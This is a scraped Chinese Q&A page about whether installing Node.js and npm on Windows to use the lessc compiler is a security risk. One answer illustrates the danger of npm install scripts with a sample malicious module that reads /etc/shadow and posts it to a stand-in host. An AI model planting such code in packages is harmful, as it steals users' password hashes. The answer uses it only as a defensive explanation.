在Windows下安装Node.js是否有任何安全隐患？_Windows_Node.js_Less

在Windows下安装Node.js是否有任何安全隐患？

windows node.js less

在Windows下安装Node.js是否有任何安全隐患？,windows,node.js,less,Windows,Node.js,Less,这就是我为什么要问的原因：为了在windows下使用lessc编译器，我必须根据以下指南安装Node.js和NPM：所以基本上，我只是：从下载并安装了Node.js 使用npm安装-g less运行并安装lessc 详细问题：我是否应该注意到任何安全隐患？Node.js是否打开任何端口？它在后台运行吗？它会自动更新吗我是否应该注意到任何安全隐患当然，正如@seven phases max在评论中指出的那样，风险在于您运行的脚本不安全或执行任何您不想执行的操作在上面的示例中，安装le

这就是我为什么要问的原因：
为了在windows下使用
lessc
编译器，我必须根据以下指南安装Node.js和NPM：
所以基本上，我只是：

从下载并安装了Node.js

使用
npm安装-g less运行并安装lessc
详细问题：我是否应该注意到任何安全隐患？Node.js是否打开任何端口？它在后台运行吗？它会自动更新吗我是否应该注意到任何安全隐患当然，正如@seven phases max在评论中指出的那样，风险在于您运行的脚本不安全或执行任何您不想执行的操作在上面的示例中，安装less时使用-g （全局）标志，这意味着在系统上以超级用户（管理员）身份安装less。正如@Explosion\u Pills所解释的：“安装可以运行任意脚本，使用sudo运行它可能非常危险！” AFAIK每个人都可以在npm上发布一个节点模块，因此我可以发布一个模块，您可以安装它，例如，它包含： var request = require('request'), fs = require('fs'); fs.readFile('/etc/shadow', 'utf8', function (err,data) { if (err) { return console.log(err); } request.post( 'http://www.example.com/passwords', { form: { key: 'value' } }, function (error, response, body) { if (!error && response.statusCode == 200) { console.log(body); } } ); }); 另请看。对于所有三个问题，答案都是“否”<代码>节点只是一个脚本的“执行环境”，它自己什么都不做。你能详细说明一下吗？NPM呢？有什么资源可以阅读更多关于这个主题的内容吗？谢谢。我想读一些关于使用
node
/
npm
的教程应该会对关键原则有所启发。简而言之，无论是
node
还是
npm
都不会在后台运行，它们也不会运行/安装任何隐藏的服务/驱动程序或任何类似的东西。当您运行/启动相应的脚本/命令/批处理文件时，它们所做的一切都由您显式控制。（因此，一般来说，它与任何其他环境都是一样的——在显式安装/执行一些
virii
tool/script之前，它是安全的）。